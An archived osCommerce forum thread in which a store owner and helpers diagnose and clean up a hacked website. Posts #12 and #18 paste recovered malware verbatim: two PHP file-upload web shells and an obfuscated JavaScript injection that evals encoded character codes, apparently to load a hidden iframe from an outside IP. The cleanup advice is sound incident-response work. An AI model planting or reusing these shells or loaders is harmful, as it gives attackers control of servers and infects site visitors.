Jump to content



Photo
- - - - -

Error in a homepage


This topic has been archived. This means that you cannot reply to this topic.
27 replies to this topic

#1   Racing Club

Racing Club
  • Members
  • 17 posts

Posted 13 March 2011 - 17:57

hello

I have a problem.

From 1 day to another my web change. Before it worked fine. But now I see this message on the homepage and the admin:

homepage: Parse error: syntax error, unexpected '<' in /home/videoclub/public_html/index.php on line 35

admin: Parse error: syntax error, unexpected '<' in /home/videoclub/public_html/admin/index.php on line 26


----------------------------------------------

Line 35: <! doctype html public "- / / W3C / / DTD HTML 4.01 Transitional / / EN">

Line 26: <! doctype html public "- / / W3C / / DTD HTML 4.01 Transitional / / EN">


Please help.

Thanks

I use version v2.2RC2a of oscommerce

#2   DunWeb

DunWeb

    The Censored One

  • Members
  • 13,084 posts

Posted 13 March 2011 - 18:58

Ariel,

check your website for hacker activity. Hackers usually try to insert code at the top of the index.php files. Perhaps you can post the first 30 lines so we can see it.




Chris
:|: Was this post helpful ? Click the LIKE THIS button :|:

See my Profile to learn more about add ons, templates, support plans and custom coding (click here)

#3   Racing Club

Racing Club
  • Members
  • 17 posts

Posted 13 March 2011 - 19:16

Thanks for replying

index.php of homepage:

<?php
/*
$Id: index.php 1739 2007-12-20 00:52:16Z hpdl $

osCommerce, Open Source E-Commerce Solutions
http://www.oscommerce.com

Copyright © 2003 osCommerce

Released under the GNU General Public License
*/

require('includes/application_top.php');

// the following cPath references come from application_top.php
$category_depth = 'top';
if (isset($cPath) && tep_not_null($cPath)) {
$categories_products_query = tep_db_query("select count(*) as total from " . TABLE_PRODUCTS_TO_CATEGORIES . " where categories_id = '" . (int)$current_category_id . "'");
$cateqories_products = tep_db_fetch_array($categories_products_query);
if ($cateqories_products['total'] > 0) {
$category_depth = 'products'; // display products
} else {
$category_parent_query = tep_db_query("select count(*) as total from " . TABLE_CATEGORIES . " where parent_id = '" . (int)$current_category_id . "'");
$category_parent = tep_db_fetch_array($category_parent_query);
if ($category_parent['total'] > 0) {
$category_depth = 'nested'; // navigate through the categories
} else {
$category_depth = 'products'; // category has no products, but display the 'no products' message
}
}
}

require(DIR_WS_LANGUAGES . $language . '/' . FILENAME_DEFAULT);

<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">
<html <?php echo HTML_PARAMS;>
<head>


index.php of admin:


<?php
/*
$Id: index.php 1739 2007-12-20 00:52:16Z hpdl $

osCommerce, Open Source E-Commerce Solutions
http://www.oscommerce.com

Copyright © 2007 osCommerce

Released under the GNU General Public License
*/

require('includes/application_top.php');

$languages = tep_get_languages();
$languages_array = array();
$languages_selected = DEFAULT_LANGUAGE;
for ($i = 0, $n = sizeof($languages); $i < $n; $i++) {
$languages_array[] = array('id' => $languages[$i]['code'],
'text' => $languages[$i]['name']);
if ($languages[$i]['directory'] == $language) {
$languages_selected = $languages[$i]['code'];
}
}

<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">
<html <?php echo HTML_PARAMS;>
<head>

#4   DunWeb

DunWeb

    The Censored One

  • Members
  • 13,084 posts

Posted 13 March 2011 - 19:29

Ariel,

Are you sure you didn't make recent changes to accommodate additional language support ?

In the index.php, this:

require(DIR_WS_LANGUAGES . $language . '/' . FILENAME_DEFAULT);

<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">
<html <?php echo HTML_PARAMS;>
<head>

Should be this:

require(DIR_WS_LANGUAGES . $language . '/' . FILENAME_DEFAULT);
?>
<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">
<html <?php echo HTML_PARAMS;>
<head>


NOTE the ?> BEFORE the doctype line ? It is also missing in your /admin/index.php and the language code

$languages = tep_get_languages();
$languages_array = array();
$languages_selected = DEFAULT_LANGUAGE;
for ($i = 0, $n = sizeof($languages); $i < $n; $i++) {
$languages_array[] = array('id' => $languages[$i]['code'],
'text' => $languages[$i]['name']);
if ($languages[$i]['directory'] == $language) {
$languages_selected = $languages[$i]['code'];
}
}

is not standard in the default download.




Chris
:|: Was this post helpful ? Click the LIKE THIS button :|:

See my Profile to learn more about add ons, templates, support plans and custom coding (click here)

#5   Racing Club

Racing Club
  • Members
  • 17 posts

Posted 13 March 2011 - 19:48

I didn´t make any changes recently and I don´t touch anything.

I try what you said and didn´t work.

Thanks

#6   DunWeb

DunWeb

    The Censored One

  • Members
  • 13,084 posts

Posted 13 March 2011 - 19:59

Ariel,

This is the first 37 lines from a default index.php file. Try it. Remember to back up before making any changes.

<?php
/*
$Id: index.php 1739 2007-12-20 00:52:16Z hpdl $

osCommerce, Open Source E-Commerce Solutions
http://www.oscommerce.com

Copyright © 2003 osCommerce

Released under the GNU General Public License
*/

require('includes/application_top.php');

// the following cPath references come from application_top.php
$category_depth = 'top';
if (isset($cPath) && tep_not_null($cPath)) {
$categories_products_query = tep_db_query("select count(*) as total from " . TABLE_PRODUCTS_TO_CATEGORIES . " where categories_id = '" . (int)$current_category_id . "'");
$cateqories_products = tep_db_fetch_array($categories_products_query);
if ($cateqories_products['total'] > 0) {
$category_depth = 'products'; // display products
} else {
$category_parent_query = tep_db_query("select count(*) as total from " . TABLE_CATEGORIES . " where parent_id = '" . (int)$current_category_id . "'");
$category_parent = tep_db_fetch_array($category_parent_query);
if ($category_parent['total'] > 0) {
$category_depth = 'nested'; // navigate through the categories
} else {
$category_depth = 'products'; // category has no products, but display the 'no products' message
}
}
}

require(DIR_WS_LANGUAGES . $language . '/' . FILENAME_DEFAULT);
?>
<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">
<html <?php echo HTML_PARAMS; ?>>
<head>


Chris
:|: Was this post helpful ? Click the LIKE THIS button :|:

See my Profile to learn more about add ons, templates, support plans and custom coding (click here)

#7   Racing Club

Racing Club
  • Members
  • 17 posts

Posted 13 March 2011 - 20:22

DunWeb,

I have a backup of my website, but I wanted to see if someone had hacked my website

#8   DunWeb

DunWeb

    The Censored One

  • Members
  • 13,084 posts

Posted 13 March 2011 - 21:01

It is hard to say if the site has been compromised based on the little information you have given and without seeing the URL. However, if you did not make the changes to the index.php and /admin/index.php then there has been some unauthorized activity.



Chris
:|: Was this post helpful ? Click the LIKE THIS button :|:

See my Profile to learn more about add ons, templates, support plans and custom coding (click here)

#9   Racing Club

Racing Club
  • Members
  • 17 posts

Posted 13 March 2011 - 21:27

Url:
www.videoclublasflores.com.ar


Thanks for all

#10   Racing Club

Racing Club
  • Members
  • 17 posts

Posted 14 March 2011 - 00:28

web page remains the same, I do not know what to do

#11   germ

germ
  • Members
  • 13,921 posts

Posted 14 March 2011 - 16:36

You have hack files all over in the images folder.
/ohmy.gif' class='bbc_emoticon' alt=':o' />

Visit the link below:

How to Secure Your Site

Pay close attention to "SECURING THE ADMIN" - Yours is vulnerable.
If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."
- Me -

"Headers already sent" - The definitive help

"Cannot redeclare ..." - How to find/fix it

SSL Implementation Help

Like this post? "Like" it again over there >

#12   Racing Club

Racing Club
  • Members
  • 17 posts

Posted 14 March 2011 - 18:09

Recently I started to see the images folder and I found this (as you are saying):

ina.htm: HACKED BY <h4> <center> kaMtiEz </ h4> </ center> <center> <h4> <br> INDONESIANCODER TEAM @ 2010 </ h4> </ center>

indonesia.htm: <html><head>



<title>Hacker Indonesia</title><style type="text/css">

html, body {

color: white;

background-color: #000080;

}



a {

background-color: transparent;

color: #ffffff;

}



#p404 {

position: absolute;

top: 20%;

left: 0px;

width: 100%;

height: 1px;

overflow: visible;

visibility: visible;

display: block;

}



#content {

margin-left: -320px;

position: absolute;

top: -100px;

left: 50%;

width: 640px;

height: 200px;

visibility: visible;

}



#errormessage {

font: 50px garamond;

line-height: 200%;

text-align: center;

}



#title, #footer {

text-align: center;

}



#title span {

background-color: #c0c0c0;

color: #000080;

}

</style><meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"></head><body>

<div id="p404">

<div id="content">

<div id="errormessage">

<p>Hacked by Hmei7</p>

</p>

</div>

</div>

</div>

</body></html>

kacuk.php: ==kacuk

<?php echo '<br><br>'.php_uname().'<br>'; echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">'; echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>'; if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'File Uploaded!<br><br>'; } else { echo 'File Upload, Failed!<br><br>'; } } ?>

==

x.htm: <b><font size="5">by iskorpitx</font></b>


(I'm not sure)
put.php: <?php

echo '<b>The KabuS<br><br>'.php_uname().'<br></b>';

echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';

echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';

if( $_POST['_upl'] == "Upload" ) {

if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload Success !!!</b><br><br>'; }

else { echo '<b>Upload Fail !!!</b><br><br>'; }

}

?>

----------------------------------


I'll keep the advice you gave me on "Securing the ADMIN.
but Can I get my website as it was before?
What should I do?

#13   DunWeb

DunWeb

    The Censored One

  • Members
  • 13,084 posts

Posted 14 March 2011 - 18:10

Ariel,

Follow these steps to clean and secure your website:

1) Lock down your site by using an .htaccess password so your customers are not attacked by the hackers code.

2) FTP all of the files to your local machine and use a program like WinGrep to identify and remove all malicious and anomalous files containing hacker code. Look for keywords such as 'base64','eval','decode'.

3) Delete the files on your hosting account before uploading the clean files.

4) FTP the clean files back to your hosting account and read and implement the security patches and contributions found in these two threads. Admin Security and Website Security.

5) Change all of your passwords: FTP, CPANEL, STORE ADMIN and DATABASE

6) Make sure File and Directory Permissions are set correctly. Directories no higher than 755, Files no higher than 644 and the TWO configure.php files no higher than 444

7) If your site has been 'black listed' as an attack site by Google, then log into Google Webmaster Tools and submit the site to be re-indexed and verified to be removed from the 'black list'

8) Remove the .htaccess password protection so your customers can resume making purchases from your website.

9) Monitor your website using the newly installed contributions to prevent future hacker attacks.

10) [Removed].



Chris

Edited by Jan Zonjee, 14 March 2011 - 21:18.

:|: Was this post helpful ? Click the LIKE THIS button :|:

See my Profile to learn more about add ons, templates, support plans and custom coding (click here)

#14   Racing Club

Racing Club
  • Members
  • 17 posts

Posted 15 March 2011 - 02:03

I delete this files from the images folder:

ina.htm
indonesia.htm
kacuk.php
x.htm
put.php


In point 2 where you asked me to find these keywords:
eval base64 decode

At those words found in a few files called:
googleff7fe2850f15ebd7.php
googlebc44d7671aae3b3e.php
google7a14fb0c01e4e5d1.php

What should I do?

#15   germ

germ
  • Members
  • 13,921 posts

Posted 15 March 2011 - 03:09

Those are all hack files.

It's not normal on 99.99% (or more) installs to have ANY php files in the images folder.

Unless you purposely put a php file in the images folder and you know exactly what it does I'd remove and and all php files from the images folder.
If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."
- Me -

"Headers already sent" - The definitive help

"Cannot redeclare ..." - How to find/fix it

SSL Implementation Help

Like this post? "Like" it again over there >

#16   DunWeb

DunWeb

    The Censored One

  • Members
  • 13,084 posts

Posted 15 March 2011 - 04:33

Jan,

I see you edited #13 post. Please explain where in the forum policies it says I can not invite other members to PM me for additional help ? I have read the forum policies AGAIN, and could not find anything to suggest that I have broken any rules.



For the record, here is #10 on the list again:

10) If you feel you can not perform any of the above steps, PM me for help, because if you miss any of these steps your site may remain accessible to the hacker.


I welcome your response here in the forum, so everyone can see it.



Chris
:|: Was this post helpful ? Click the LIKE THIS button :|:

See my Profile to learn more about add ons, templates, support plans and custom coding (click here)

#17   Racing Club

Racing Club
  • Members
  • 17 posts

Posted 15 March 2011 - 07:45

I delete these files and tomorrow I will download version 2.2 for correction of the two index.php

Thanks

I hope it works

Edited by Racing Club, 15 March 2011 - 07:54.


#18   Racing Club

Racing Club
  • Members
  • 17 posts

Posted 16 March 2011 - 06:10

At the footer of the index.php I found this:

<script>function createCSS(selector,declaration){var ua=navigator.userAgent.toLowerCase();var isIE=(/msie/.test(ua))&&!(/opera/.test(ua))&&(/win/.test(ua));var style_node=document.createElement("style");if(!isIE)style_node.innerHTML=selector+" {"+declaration+"}";document.getElementsByTagName("head")[0].appendChild(style_node);if(isIE&&document.styleSheets&&document.styleSheets.length>0){var last_style_node=document.styleSheets[document.styleSheets.length-1];if(typeof(last_style_node.addRule)=="object")last_style_node.addRule(selector,declaration);}};createCSS("#va","background:url(data:,String.fromCharCode)");var ucyq=null;var r=document.styleSheets;for(var i=0;i<r.length;i++){try{var vpm=r[i].cssRules||r[i].rules;for(var lqf=0;lqf<vpm.length;lqf++){var gl=vpm.item?vpm.item(lqf):vpm[lqf];if(!gl.selectorText.match(/#va/))continue;qq=(gl.cssText)?gl.cssText:gl.style.cssText;ucyq=qq.match(/(S[^")]+)/)[1];zio=gl.selectorText.substr(1);};}catch(e){};}oe=new Date(2010,11,3,2,21,4);t=oe.getSeconds();var vo=[36/t,36/t,420/t,408/t,128/t,160/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,412/t,404/t,464/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,460/t,264/t,484/t,336/t,388/t,412/t,312/t,388/t,436/t,404/t,160/t,156/t,392/t,444/t,400/t,484/t,156/t,164/t,364/t,192/t,372/t,164/t,492/t,52/t,36/t,36/t,36/t,420/t,408/t,456/t,388/t,436/t,404/t,456/t,160/t,164/t,236/t,52/t,36/t,36/t,500/t,128/t,404/t,432/t,460/t,404/t,128/t,492/t,52/t,36/t,36/t,36/t,472/t,388/t,456/t,128/t,392/t,400/t,484/t,128/t,244/t,128/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,396/t,456/t,404/t,388/t,464/t,404/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,160/t,136/t,392/t,444/t,400/t,484/t,136/t,164/t,236/t,52/t,36/t,36/t,36/t,464/t,456/t,484/t,128/t,492/t,52/t,36/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,388/t,448/t,448/t,404/t,440/t,400/t,268/t,416/t,420/t,432/t,400/t,160/t,392/t,400/t,484/t,164/t,236/t,52/t,36/t,36/t,36/t,500/t,128/t,396/t,388/t,464/t,396/t,416/t,128/t,160/t,404/t,164/t,128/t,492/t,52/t,36/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,392/t,444/t,400/t,484/t,128/t,244/t,128/t,392/t,400/t,484/t,236/t,52/t,36/t,36/t,36/t,500/t,52/t,36/t,36/t,36/t,420/t,408/t,128/t,160/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,412/t,404/t,464/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,460/t,264/t,484/t,336/t,388/t,412/t,312/t,388/t,436/t,404/t,160/t,156/t,392/t,444/t,400/t,484/t,156/t,164/t,364/t,192/t,372/t,164/t,492/t,52/t,36/t,36/t,36/t,36/t,420/t,408/t,456/t,388/t,436/t,404/t,456/t,160/t,164/t,236/t,52/t,36/t,36/t,36/t,500/t,128/t,404/t,432/t,460/t,404/t,128/t,492/t,52/t,36/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,476/t,456/t,420/t,464/t,404/t,160/t,136/t,240/t,420/t,408/t,456/t,388/t,436/t,404/t,128/t,460/t,456/t,396/t,244/t,156/t,416/t,464/t,464/t,448/t,232/t,188/t,188/t,228/t,208/t,184/t,216/t,204/t,184/t,200/t,208/t,208/t,184/t,212/t,220/t,188/t,476/t,204/t,396/t,188/t,156/t,128/t,476/t,420/t,400/t,464/t,416/t,244/t,156/t,196/t,192/t,156/t,128/t,416/t,404/t,420/t,412/t,416/t,464/t,244/t,156/t,196/t,192/t,156/t,128/t,460/t,464/t,484/t,432/t,404/t,244/t,156/t,472/t,420/t,460/t,420/t,392/t,420/t,432/t,420/t,464/t,484/t,232/t,416/t,420/t,400/t,400/t,404/t,440/t,236/t,448/t,444/t,460/t,420/t,464/t,420/t,444/t,440/t,232/t,388/t,392/t,460/t,444/t,432/t,468/t,464/t,404/t,236/t,432/t,404/t,408/t,464/t,232/t,192/t,236/t,464/t,444/t,448/t,232/t,192/t,236/t,156/t,248/t,240/t,188/t,420/t,408/t,456/t,388/t,436/t,404/t,248/t,136/t,164/t,236/t,52/t,36/t,36/t,36/t,500/t,52/t,36/t,36/t,500/t,52/t,36/t,36/t,408/t,468/t,440/t,396/t,464/t,420/t,444/t,440/t,128/t,420/t,408/t,456/t,388/t,436/t,404/t,456/t,160/t,164/t,492/t,52/t,36/t,36/t,36/t,472/t,388/t,456/t,128/t,408/t,128/t,244/t,128/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,396/t,456/t,404/t,388/t,464/t,404/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,160/t,156/t,420/t,408/t,456/t,388/t,436/t,404/t,156/t,164/t,236/t,408/t,184/t,460/t,404/t,464/t,260/t,464/t,464/t,456/t,420/t,392/t,468/t,464/t,404/t,160/t,156/t,460/t,456/t,396/t,156/t,176/t,156/t,416/t,464/t,464/t,448/t,232/t,188/t,188/t,228/t,208/t,184/t,216/t,204/t,184/t,200/t,208/t,208/t,184/t,212/t,220/t,188/t,476/t,204/t,396/t,188/t,156/t,164/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,472/t,420/t,460/t,420/t,392/t,420/t,432/t,420/t,464/t,484/t,244/t,156/t,416/t,420/t,400/t,400/t,404/t,440/t,156/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,448/t,444/t,460/t,420/t,464/t,420/t,444/t,440/t,244/t,156/t,388/t,392/t,460/t,444/t,432/t,468/t,464/t,404/t,156/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,432/t,404/t,408/t,464/t,244/t,156/t,192/t,156/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,464/t,444/t,448/t,244/t,156/t,192/t,156/t,236/t,408/t,184/t,460/t,404/t,464/t,260/t,464/t,464/t,456/t,420/t,392/t,468/t,464/t,404/t,160/t,156/t,476/t,420/t,400/t,464/t,416/t,156/t,176/t,156/t,196/t,192/t,156/t,164/t,236/t,408/t,184/t,460/t,404/t,464/t,260/t,464/t,464/t,456/t,420/t,392/t,468/t,464/t,404/t,160/t,156/t,416/t,404/t,420/t,412/t,416/t,464/t,156/t,176/t,156/t,196/t,192/t,156/t,164/t,236/t,52/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,412/t,404/t,464/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,460/t,264/t,484/t,336/t,388/t,412/t,312/t,388/t,436/t,404/t,160/t,156/t,392/t,444/t,400/t,484/t,156/t,164/t,364/t,192/t,372/t,184/t,388/t,448/t,448/t,404/t,440/t,400/t,268/t,416/t,420/t,432/t,400/t,160/t,408/t,164/t,236/t,52/t,36/t,36/t,500/t];var fme="";var g=function(){return this;}();tevq=g["e"+zio+"l"];var cet="";hj=tevq(ucyq);for(var i=0;i<vo.length;i++){aig=tevq(vo[i]);cet+=hj(aig);}tevq(cet);</script>

I already removed and now I'm adding this:
?>
because it is missing several lines.

I'll report how I progress.

Thanks!

I was slow to respond because I spent the whole afternoon removing a virus in my computer

Edited by Racing Club, 16 March 2011 - 06:16.


#19   Racing Club

Racing Club
  • Members
  • 17 posts

Posted 16 March 2011 - 07:06

I am done!
Now when I go to my website or the admin page goes blank.

I see when loading Internet Explorer other addresses down

Thanks!

#20   Racing Club

Racing Club
  • Members
  • 17 posts

Posted 17 March 2011 - 06:10

please help!

Thanks!